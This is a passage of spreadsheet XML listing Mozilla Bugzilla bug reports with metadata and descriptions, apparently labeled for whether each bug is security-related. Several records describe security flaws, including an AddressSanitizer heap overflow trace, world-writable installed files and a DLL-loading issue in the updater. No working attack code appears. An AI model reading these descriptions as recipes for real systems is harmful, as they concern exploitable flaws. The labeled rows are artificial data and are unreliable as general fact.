Calling the "mozRequestFullScreen()" function and then "history.go(-1)" can cause a crash or a DoS in Mozilla Firefox.
I have created a test case that will replicate the issue. 
As the Offset value can change, it can be a security issue as well. However, I could not find out the reason for this offset change.
Please also verify if it can be a case for the bug bounty.
Actual results:
Mozilla Firefox show the crash reporter
Or
It becomes unresponsive
If you cannot see this result, please use the provided attach file and do it again. Note: Your history should not be empty.
Expected results:
It should disable the full screen and then redirect the user to the previous page.</t>
        </is>
      </c>
      <c r="X1210" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" t="n">
        <v>1155321</v>
      </c>
      <c r="B1211" t="inlineStr">
        <is>
          <t>2015-04-16 11:44:46 -0700</t>
        </is>
      </c>
      <c r="C1211" t="inlineStr">
        <is>
          <t>Job name in job details is getting incorrectly parsed on stage</t>
        </is>
      </c>
      <c r="D1211" t="inlineStr">
        <is>
          <t>2015-05-20 04:34:29 -0700</t>
        </is>
      </c>
      <c r="E1211" t="n">
        <v>1</v>
      </c>
      <c r="F1211" t="n">
        <v>1</v>
      </c>
      <c r="G1211" t="n">
        <v>7</v>
      </c>
      <c r="H1211" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1211" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1211" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1211" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1211" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1211" t="inlineStr"/>
      <c r="Q1211" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1211" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1211" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1211" t="n">
        <v>1</v>
      </c>
      <c r="U1211" t="n">
        <v>0</v>
      </c>
      <c r="V1211" t="n">
        <v>8</v>
      </c>
      <c r="W1211" t="inlineStr">
        <is>
          <t>Currently on stage with latest master changes, the Job name: field is getting incorrectly parsed. For example:
Production:
Linux mozilla-central build
Stage:
Linux opt unknown ? Build B
Camd mentioned it may be a side effect of a recent change, so assigning per his request.</t>
        </is>
      </c>
      <c r="X1211" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" t="n">
        <v>818454</v>
      </c>
      <c r="B1212" t="inlineStr">
        <is>
          <t>2012-12-05 05:31:12 -0800</t>
        </is>
      </c>
      <c r="C1212" t="inlineStr">
        <is>
          <t>Out of Bounds Read in SelectionIterator::GetNextSegment</t>
        </is>
      </c>
      <c r="D1212" t="inlineStr">
        <is>
          <t>2014-11-20 17:38:43 -0800</t>
        </is>
      </c>
      <c r="E1212" t="n">
        <v>1</v>
      </c>
      <c r="F1212" t="n">
        <v>1</v>
      </c>
      <c r="G1212" t="n">
        <v>3</v>
      </c>
      <c r="H1212" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1212" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1212" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1212" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1212" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1212" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1212" t="inlineStr">
        <is>
          <t>[asan][adv-main21+]</t>
        </is>
      </c>
      <c r="Q1212" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1212" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1212" t="n">
        <v>1</v>
      </c>
      <c r="U1212" t="n">
        <v>0</v>
      </c>
      <c r="V1212" t="n">
        <v>29</v>
      </c>
      <c r="W1212" t="inlineStr">
        <is>
          <t>Created attachment 688730
Testcase
==31621== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ff3ebc86f00 at pc 0x7ff40dbe4966 bp 0x7fff6b40d150 sp 0x7fff6b40d148
READ of size 4 at 0x7ff3ebc86f00 thread T0
    #0 0x7ff40dbe4965 in gfxShapedWord::CompressedGlyph::IsClusterStart() const src/gfx/thebes/gfxFont.h:1920
    #1 0x7ff40db2dfbc in gfxTextRun::IsClusterStart(unsigned int) src/gfx/thebes/gfxFont.h:2383
    #2 0x7ff40db5c58c in SelectionIterator::GetNextSegment(double*, unsigned int*, unsigned int*, double*, short*, nsTextRangeStyle*) src/layout/generic/nsTextFrameThebes.cpp:5287
    #3 0x7ff40db6c52d in nsTextFrame::PaintTextSelectionDecorations(gfxContext*, gfxPoint const&amp;, gfxPoint const&amp;, gfxRect const&amp;, PropertyProvider&amp;, unsigned int, unsigned int, nsTextPaintStyle&amp;, SelectionDetails*, short, nsTextFrame::DrawPathCallbacks*) src/layout/generic/nsTextFrameThebes.cpp:5581
    #4 0x7ff40db707ab in nsTextFrame::PaintTextWithSelection(gfxContext*, gfxPoint const&amp;, gfxPoint const&amp;, gfxRect const&amp;, PropertyProvider&amp;, unsigned int, unsigned int, nsTextPaintStyle&amp;, nsCharClipDisplayItem::ClipEdges const&amp;, nsTextFrame::DrawPathCallbacks*) src/layout/generic/nsTextFrameThebes.cpp:5636
    #5 0x7ff40db4d125 in nsTextFrame::PaintText(nsRenderingContext*, nsPoint, nsRect const&amp;, nsCharClipDisplayItem const&amp;, nsTextFrame::DrawPathCallbacks*) src/layout/generic/nsTextFrameThebes.cpp:5860
    #6 0x7ff40db4b2d3 in nsDisplayText::Paint(nsDisplayListBuilder*, nsRenderingContext*) src/layout/generic/nsTextFrameThebes.cpp:4572
    #7 0x7ff40cdde2f6 in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) src/layout/base/FrameLayerBuilder.cpp:3282
    #8 0x7ff41a3d6a0f in mozilla::layers::BasicThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) src/gfx/layers/basic/BasicThebesLayer.h:94
    #9 0x7ff41a3d60be in mozilla::layers::BasicShadowableThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) src/gfx/layers/basic/BasicThebesLayer.cpp:402
    #10 0x7ff41a3cec7b in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:189
    #11 0x7ff41a3d371a in mozilla::layers::BasicShadowableThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:303
    #12 0x7ff41a3d4103 in non-virtual thunk to mozilla::layers::BasicShadowableThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:314
    #13 0x7ff41a35d495 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:827
    #14 0x7ff41a35a8e9 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:942
    #15 0x7ff41a35da75 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:843
    #16 0x7ff41a35a8e9 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:942
    #17 0x7ff41a35da75 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:843
    #18 0x7ff41a35a8e9 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:942
    #19 0x7ff41a355d01 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:589
    #20 0x7ff41a354447 in mozilla::layers::BasicLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:508
    #21 0x7ff41a3677c3 in mozilla::layers::BasicShadowLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:1142
    #22 0x7ff40d0d70cc in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const src/layout/base/nsDisplayList.cpp:1141
    #23 0x7ff40d0d4227 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const src/layout/base/nsDisplayList.cpp:1003
    #24 0x7ff40d276425 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) src/layout/base/nsLayoutUtils.cpp:1872
    #25 0x7ff40d3cd0a9 in PresShell::Paint(nsIView*, nsRegion const&amp;, unsigned int) src/layout/base/nsPresShell.cpp:5329
    #26 0x7ff41140e63a in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) src/view/src/nsViewManager.cpp:433
    #27 0x7ff411421a2c in nsViewManager::ProcessPendingUpdates() src/view/src/nsViewManager.cpp:1208
    #28 0x7ff40d44c1e7 in nsRefreshDriver::Notify(nsITimer*) src/layout/base/nsRefreshDriver.cpp:432
    #29 0x7ff419ad5f63 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:485
    #30 0x7ff419ad7301 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:565
    #31 0x7ff419a99ffe in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
    #32 0x7ff41970f08f in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:221
    #33 0x7ff417c8d2b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #34 0x7ff419d82ade in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
    #35 0x7ff419d82925 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
    #36 0x7ff419d8280b in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
    #37 0x7ff4170a55f4 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #38 0x7ff415c06af2 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #39 0x7ff40b126c44 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
    #40 0x7ff40b12c919 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
    #41 0x7ff40b12f690 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4084
    #42 0x40c0c6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #43 0x409900 in main src/browser/app/nsBrowserApp.cpp:279
    #44 0x7ff42b5fa76c in
0x7ff3ebc86f00 is located 8 bytes to the right of 184-byte region [0x7ff3ebc86e40,0x7ff3ebc86ef8)
allocated by thread T0 here:
    #0 0x4c3810 in malloc
    #1 0x7ff429188855 in moz_malloc src/memory/mozalloc/mozalloc.cpp:64
    #2 0x7ff41a10d1eb in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) src/gfx/thebes/gfxFont.cpp:4491
    #3 0x7ff41a0f0441 in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) src/gfx/thebes/gfxFont.cpp:4508
    #4 0x7ff41a0f3d33 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) src/gfx/thebes/gfxFont.cpp:3553
    #5 0x7ff40db1473a in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) src/layout/generic/nsTextFrameThebes.cpp:553
    #6 0x7ff40db0963b in BuildTextRunsScanner::BuildTextRunForFrames(void*) src/layout/generic/nsTextFrameThebes.cpp:2050
    #7 0x7ff40dafe5f5 in BuildTextRunsScanner::FlushFrames(bool, bool) src/layout/generic/nsTextFrameThebes.cpp:1409
    #8 0x7ff40db0e12d in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1601
Shadow byte and word:
  0x1ffe7d790de0: fa
  0x1ffe7d790de0: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x1ffe7d790dc0: fa fa fa fa fa fa fa fa
  0x1ffe7d790dc8: 00 00 00 00 00 00 00 00
  0x1ffe7d790dd0: 00 00 00 00 00 00 00 00
  0x1ffe7d790dd8: 00 00 00 00 00 00 00 fb
=&gt;0x1ffe7d790de0: fa fa fa fa fa fa fa fa
  0x1ffe7d790de8: 00 00 00 00 00 00 00 00
  0x1ffe7d790df0: 00 00 00 00 00 00 fb fb
  0x1ffe7d790df8: fa fa fa fa fa fa fa fa
  0x1ffe7d790e00: fa fa fa fa fa fa fa fa
Stats: 262M malloced (245M for red zones) by 451453 calls
Stats: 47M realloced by 19228 calls
Stats: 228M freed by 226481 calls
Stats: 193M really freed by 173783 calls
Stats: 245M (62800 full pages) mmaped in 467 calls
  mmaps   by size class: 7:217035; 8:47081; 9:14322; 10:5621; 11:7650; 12:1280; 13:1088; 14:512; 15:224; 16:720; 17:464; 18:34; 19:35; 20:21;
  mallocs by size class: 7:304827; 8:87290; 9:24303; 10:8218; 11:17377; 12:2304; 13:2068; 14:1626; 15:415; 16:1440; 17:1449; 18:73; 19:41; 20:22;
  frees   by size class: 7:125017; 8:55922; 9:17553; 10:4893; 11:15407; 12:1512; 13:1639; 14:1437; 15:293; 16:1261; 17:1430; 18:60; 19:38; 20:19;
  rfrees  by size class: 7:95680; 8:43221; 9:14163; 10:3105; 11:11615; 12:1100; 13:1032; 14:1283; 15:230; 16:933; 17:1315; 18:50; 19:37; 20:19;
Stats: malloc large: 3440 small slow: 5269
==31621== ABORTING</t>
        </is>
      </c>
      <c r="X1212" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" t="n">
        <v>231083</v>
      </c>
      <c r="B1213" t="inlineStr">
        <is>
          <t>2004-01-16 03:25:09 -0800</t>
        </is>
      </c>
      <c r="C1213" t="inlineStr">
        <is>
          <t>wrong file permissions after installation</t>
        </is>
      </c>
      <c r="D1213" t="inlineStr">
        <is>
          <t>2011-08-05 22:35:12 -0700</t>
        </is>
      </c>
      <c r="E1213" t="n">
        <v>1</v>
      </c>
      <c r="F1213" t="n">
        <v>1</v>
      </c>
      <c r="G1213" t="n">
        <v>2</v>
      </c>
      <c r="H1213" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1213" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1213" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K1213" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1213" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1213" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1213" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1213" t="inlineStr">
        <is>
          <t>[sg:local exploit] respin mozilla1.6-linux?</t>
        </is>
      </c>
      <c r="Q1213" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1213" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1213" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1213" t="n">
        <v>1</v>
      </c>
      <c r="U1213" t="n">
        <v>0</v>
      </c>
      <c r="V1213" t="n">
        <v>45</v>
      </c>
      <c r="W1213" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040113
After installation, many installed files are group and world writable, even
though the installer was run with the umask value 0022.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X1213" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" t="n">
        <v>881788</v>
      </c>
      <c r="B1214" t="inlineStr">
        <is>
          <t>2013-06-11 10:09:43 -0700</t>
        </is>
      </c>
      <c r="C1214" t="inlineStr">
        <is>
          <t>Reissue is a 404</t>
        </is>
      </c>
      <c r="D1214" t="inlineStr">
        <is>
          <t>2013-06-19 06:40:21 -0700</t>
        </is>
      </c>
      <c r="E1214" t="n">
        <v>1</v>
      </c>
      <c r="F1214" t="n">
        <v>1</v>
      </c>
      <c r="G1214" t="n">
        <v>6</v>
      </c>
      <c r="H1214" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1214" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1214" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K1214" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L1214" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1214" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1214" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1214" t="inlineStr"/>
      <c r="Q1214" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1214" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1214" t="inlineStr">
        <is>
          <t>2013-06-20</t>
        </is>
      </c>
      <c r="T1214" t="n">
        <v>1</v>
      </c>
      <c r="U1214" t="n">
        <v>0</v>
      </c>
      <c r="V1214" t="n">
        <v>6</v>
      </c>
      <c r="W1214" t="inlineStr">
        <is>
          <t>This url added in bug 781258 is a 404. Would like to get this fixed before real receipts go out, because we can't change them.
This possibly could be the same page as bug 881450.</t>
        </is>
      </c>
      <c r="X1214" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" t="n">
        <v>1121494</v>
      </c>
      <c r="B1215" t="inlineStr">
        <is>
          <t>2015-01-14 07:21:51 -0800</t>
        </is>
      </c>
      <c r="C1215" t="inlineStr">
        <is>
          <t>Treeherder not ingesting completed jobs</t>
        </is>
      </c>
      <c r="D1215" t="inlineStr">
        <is>
          <t>2015-01-16 09:46:33 -0800</t>
        </is>
      </c>
      <c r="E1215" t="n">
        <v>1</v>
      </c>
      <c r="F1215" t="n">
        <v>1</v>
      </c>
      <c r="G1215" t="n">
        <v>7</v>
      </c>
      <c r="H1215" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1215" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1215" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K1215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1215" t="inlineStr"/>
      <c r="Q1215" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1215" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1215" t="n">
        <v>1</v>
      </c>
      <c r="U1215" t="n">
        <v>0</v>
      </c>
      <c r="V1215" t="n">
        <v>4</v>
      </c>
      <c r="W1215" t="inlineStr">
        <is>
          <t>7:17 &lt; Tomcat|sheriffduty&gt; mdoglio: comparing https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;revision=ad2042b4c668 and https://tbpl.mozilla.org/?tree=Mozilla-Inbound&amp;rev=ad2042b4c668
07:17 &lt; Tomcat|sheriffduty&gt; shows 2 different things in terms of completed results
07:18 &lt; Tomcat|sheriffduty&gt; RyanVM: ^ 
07:18 &lt; Tomcat|sheriffduty&gt; mdoglio: and seems this is since the checkin from 12:30 your time 
07:19 &lt; Tomcat|sheriffduty&gt; seems TH is missing test results
07:19 &lt; RyanVM&gt; looks like we're having data ingestion issues?
07:19 &lt; Tomcat|sheriffduty&gt; outch</t>
        </is>
      </c>
      <c r="X1215" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" t="n">
        <v>1886683</v>
      </c>
      <c r="B1216" t="inlineStr">
        <is>
          <t>2024-03-21 01:22:30 -0700</t>
        </is>
      </c>
      <c r="C1216" t="inlineStr">
        <is>
          <t>Assertion failure: this-&gt;flags() == 0, at gc/Cell.h:797</t>
        </is>
      </c>
      <c r="D1216" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:41 -0700</t>
        </is>
      </c>
      <c r="E1216" t="n">
        <v>1</v>
      </c>
      <c r="F1216" t="n">
        <v>1</v>
      </c>
      <c r="G1216" t="n">
        <v>3</v>
      </c>
      <c r="H1216" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1216" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1216" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K1216" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1216" t="inlineStr">
        <is>
          <t>[adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q1216" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1216" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1216" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T1216" t="n">
        <v>1</v>
      </c>
      <c r="U1216" t="n">
        <v>0</v>
      </c>
      <c r="V1216" t="n">
        <v>22</v>
      </c>
      <c r="W1216" t="inlineStr">
        <is>
          <t>Created attachment 9392448
crash.js
Steps to reproduce:
This issue is about a flakey crash in the js-shell invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fast-warmup --ion-check-range-analysis --
ion-extra-checks --fuzzing-safe --disable-oom-functions --enable-new-set-methods crash.js`.
I captured a pernos.co trace on my laptop on git commit 6a2a2a52d7e544a2fd5678d04991a7e78b694f22 (which is a couple of days old). On the server, the issue reproduces reliably even on the latest git commit f63ca2952da98e0817bdae0ddf1314281a497106.
Depending on your machine should be able to reproduce locally.
https://pernos.co/debug/Nmk1pGH10Siby2PktNMINw/index.html
```
#0  js::gc::CellWithTenuredGCPointer&lt;js::gc::Cell, js::Shape&gt;::headerPtr (this=&lt;optimized out&gt;)
    at js/src/gc/Cell.h:797
#1  JSObject::shape (this=&lt;optimized out&gt;) at js/src/vm/JSObject.h:93
#2  JSObject::getClass (this=&lt;optimized out&gt;) at js/src/vm/JSObject.h:114
#3  JSObject::is&lt;WasmValueBox&gt; (this=&lt;optimized out&gt;) at js/src/vm/JSObject.h:492
#4  js::wasm::AnyRef::toJSValue (this=&lt;optimized out&gt;) at js/src/wasm/WasmAnyRef.cpp:119
#5  0x00005722f405482f in ToJSValue_externref&lt;js::wasm::NoDebug&gt; (src=0x5722f0c6e5de, dst=..., cx=&lt;optimized out&gt;)
    at js/src/wasm/WasmValue.cpp:757
#6  js::wasm::ToJSValue&lt;js::wasm::NoDebug&gt; (cx=cx@entry=0x7ded5833d200, src=src@entry=0x7ffeab2c6be0, type=..., dst=..., 
    level=level@entry=js::wasm::CoercionLevel::Spec) at js/src/wasm/WasmValue.cpp:820
#7  0x00005722f4053526 in js::wasm::ToJSValue&lt;js::wasm::NoDebug&gt; (cx=0x7ded5833d200, src=src@entry=0x7ffeab2c6be0, type=..., 
    dst=..., level=level@entry=js::wasm::CoercionLevel::Spec) at js/src/wasm/WasmValue.cpp:842
#8  0x00005722f2508fd1 in js::wasm::Instance::callImport (this=0x7ded5397c300, cx=0x7ded5833d200, 
    funcImportIndex=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, argv=0x7ffeab2c6be0)
    at js/src/wasm/WasmInstance.cpp:264
#9  0x00005722f250a424 in js::wasm::Instance::callImport_general (instance=0x7ded586008e0 &lt;_IO_stdfile_2_lock&gt;, 
    funcImportIndex=1482684227, argc=-184039728, argv=0x0) at js/src/wasm/WasmInstance.cpp:349
#10 0x00001e165f9e3ee3 in ?? ()
#11 0x00000f1bebdfff60 in ?? ()
#12 0x3e09a6bdc70b2d00 in ?? ()
#13 0x00007ffeab2c6c80 in ?? ()
```</t>
        </is>
      </c>
      <c r="X1216" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" t="n">
        <v>859072</v>
      </c>
      <c r="B1217" t="inlineStr">
        <is>
          <t>2013-04-07 03:58:27 -0700</t>
        </is>
      </c>
      <c r="C1217" t="inlineStr">
        <is>
          <t>The updater.exe loads the profapi.dll from the update directory</t>
        </is>
      </c>
      <c r="D1217" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:00 -0700</t>
        </is>
      </c>
      <c r="E1217" t="n">
        <v>1</v>
      </c>
      <c r="F1217" t="n">
        <v>1</v>
      </c>
      <c r="G1217" t="n">
        <v>3</v>
      </c>
      <c r="H1217" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1217" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1217" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1217" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L1217" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1217" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1217" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1217" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+] introduced by Win7, affects Win8 as well</t>
        </is>
      </c>
